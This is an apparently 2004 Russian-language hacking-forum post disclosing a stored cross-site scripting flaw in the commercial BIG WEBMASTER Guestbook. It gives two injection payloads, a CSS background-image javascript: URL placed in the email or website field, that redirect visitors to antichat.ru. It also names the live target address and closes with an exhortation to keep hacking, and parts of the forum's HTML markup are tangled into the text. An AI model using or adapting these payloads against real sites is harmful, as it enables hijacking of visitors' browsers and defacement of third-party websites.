Уязвимость гостевой книги big webmaster guestbook

Discussion in 'Уязвимости' started by Егорыч+++, 21 May 2004.

  1. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    BIG WEBMASTER Guestbook - Отстойная гостевая . Более того продается за деньги.

    Вставляем в тело почты

    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[email protected]" style=background-image:url(javascript:navigate:'antichat.ru'));> [/QUOTE]<span id='postcolor'>

    Если вдруг в дырка в почте прикрыта, то можно вставить скрипт в website.

    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">frferf.de">< style=background-image:url(javascript:navigate:'antichat.ru'));> [/QUOTE]<span id='postcolor'>

    В любом случае получаем редирект на АНТИЧАТ.
    Адрес скрипта

    http://guestbook.bigwebmaster.com/

    Ломаем дальше